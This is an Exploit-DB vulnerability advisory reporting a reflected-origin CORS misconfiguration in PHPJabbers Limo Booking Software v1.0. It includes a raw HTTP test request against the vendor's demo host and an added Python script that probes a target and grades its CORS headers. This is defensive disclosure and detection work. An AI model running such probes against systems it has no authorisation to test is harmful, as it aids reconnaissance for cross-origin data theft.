Limo Booking Software v1.0 – CORS

  • Author: nu11secur1ty
    Date: 2023-10-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51744/
  • ## Title: Limo Booking Software v1.0 - CORS 
    ## Author: nu11secur1ty
    ## Date: 09/08/2023
    ## Vendor: https://www.phpjabbers.com/
    ## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo
    ## Reference: https://portswigger.net/web-security/cors
    
    ## Description:
    The application implements an HTML5 cross-origin resource sharing
    (CORS) policy for this request that allows access from any domain:
    the value of the Origin request header is reflected back in the
    response's Access-Control-Allow-Origin header. In the test below the
    application allowed access from the arbitrary origin http://wioydcbiourl.com.
    Since the Vary: Origin header was not present in the response, reverse
    proxies and intermediate servers may cache a response that carries the
    attacker-chosen Access-Control-Allow-Origin value and serve it to other
    clients, which may enable cache poisoning. A page on an attacker-controlled
    origin can read the response to this request cross-origin without the
    victim knowing it. How much that exposes depends on whether the response
    also carries Access-Control-Allow-Credentials: true and on whether the
    endpoint (pjFrontPublic / pjActionFleets) returns anything a client could
    not already fetch anonymously; the test request below sends no cookies,
    so it exercises only the unauthenticated case.
    
    STATUS: HIGH Vulnerability
    
    [+]Test Payload:
    ```http
    GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795 HTTP/1.1
    Host: demo.phpjabbers.com
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Origin: http://wioydcbiourl.com
    Referer: http://demo.phpjabbers.com/
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0

    ```
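The following Python check replays the probe above and grades the response headers for the conditions the description names (an echoed arbitrary origin, a missing Vary: Origin, and the Access-Control-Allow-Credentials header that decides how serious the echo is). It is an added example, not part of the original advisory or of the vendor's software. The header sets `VULNERABLE_HEADERS` and `HARDENED_HEADERS` are constructed for illustration rather than captured from demo.phpjabbers.com, and `assess_cors`, `probe` and `PROBE_ORIGIN` are names introduced here.

```python
"""Replay a CORS probe with a foreign Origin and grade the response headers.

Added example; not the advisory's or the vendor's code. The header sets
below are constructed for illustration, not captured from the vendor demo.
"""
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# The arbitrary origin used in the advisory's test request. Assumed to be
# attacker-controlled; any domain the application does not own will do.
PROBE_ORIGIN = "http://wioydcbiourl.com"


def assess_cors(request_origin: str, headers: dict) -> dict:
    """Grade one response to a request that carried `Origin: request_origin`.

    Header names are matched case-insensitively. Returns the individual
    findings plus a coarse severity: "high" only when the echoed origin is
    combined with Access-Control-Allow-Credentials: true, since that is what
    lets an attacker's page read a victim's authenticated responses.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    vary = {v.strip().lower() for v in h.get("vary", "").split(",") if v.strip()}

    reflects = acao is not None and acao == request_origin
    wildcard = acao == "*"
    findings = {
        "acao_present": acao is not None,
        "reflects_arbitrary_origin": reflects,
        "wildcard_origin": wildcard,
        "allows_credentials": creds,
        # A per-origin ACAO value without Vary: Origin lets a shared cache
        # store the attacker's origin and hand that response to other clients.
        "vary_origin_missing": acao is not None and not wildcard and "origin" not in vary,
    }
    if reflects and creds:
        findings["severity"] = "high"
    elif reflects or wildcard:
        # Browsers refuse "*" together with credentials, and without
        # credentials only content readable anonymously is exposed cross-origin.
        findings["severity"] = "low"
    else:
        findings["severity"] = "none"
    return findings


def probe(url: str, origin: str = PROBE_ORIGIN, timeout: float = 10.0) -> dict:
    """Send one GET with a foreign Origin header and grade the live response.

    Network call, for use only against a target you are authorised to test;
    the constructed samples below exercise assess_cors() offline instead.
    """
    req = Request(url, headers={"Origin": origin, "User-Agent": "cors-probe/1.0"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return assess_cors(origin, dict(resp.getheaders()))
    except HTTPError as err:  # 4xx/5xx responses still carry CORS headers
        return assess_cors(origin, dict(err.headers.items()))


# Constructed sample: what the advisory describes, origin echoed, no Vary.
VULNERABLE_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Access-Control-Allow-Origin": PROBE_ORIGIN,
    "Cache-Control": "public, max-age=3600",
}

# Constructed sample: an allowlisted origin plus Vary: Origin, the usual fix.
HARDENED_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Access-Control-Allow-Origin": "https://booking.example",
    "Vary": "Origin",
}

if __name__ == "__main__":
    for label, hdrs in (("vulnerable", VULNERABLE_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, assess_cors(PROBE_ORIGIN, hdrs))
```

Against a live target, `probe("http://host/path", PROBE_ORIGIN)` returns the same findings for the real response. The severity field only separates the credentialed case from the rest; what the endpoint actually returns, and therefore whether a cross-origin read is worth anything to an attacker, still has to be judged by hand.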
    
    ## Reproduce:
    https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0
    
    ## Proof and Exploit:
    https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html
    
    ## Time spent:
    00:35:00